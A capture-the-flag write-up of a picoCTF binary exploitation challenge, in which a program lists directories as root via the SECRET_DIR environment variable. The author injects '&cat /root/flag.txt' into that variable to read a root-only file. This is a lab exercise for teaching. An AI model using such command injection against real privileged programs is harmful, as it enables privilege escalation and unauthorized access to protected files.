200 points
Category: Binary Exploitation
Tags : #environment #injection
We've got a binary that can list directories as root, try it out !!
ssh to saturn.picoctf.net:<port>, and run the binary named bin once connected. Login as ctf-player with the supplied password.
Running bin on the remote challenge instance yields :
ctf-player@pico-chall$ ./bin
Error: SECRET_DIR environment variable is not set
Setting the SECRET_DIR environment variable on command execution we get :
ctf-player@pico-chall$ SECRET_DIR=. ./bin
Listing the content of . as root:
bin
Ok, so lets get the directory listing of /root :
ctf-player@pico-chall$ SECRET_DIR=/root ./bin
Listing the content of /root as root:
flag.txt
We've found our flag, but permissions don't allow us to read the flag files contents :
ctf-player@pico-chall$ cat /root/flag.txt
cat: /root/flag.txt: Permission denied
Let's try injecting a command into the SECRET_DIR environment variable (actual flag value has been redacted for the purposes for this write up) :
ctf-player@pico-chall$ SECRET_DIR="/root&cat /root/flag.txt" ./bin
Listing the content of /root&cat /root/flag.txt as root:
picoCTF{...........redacted.............}flag.txt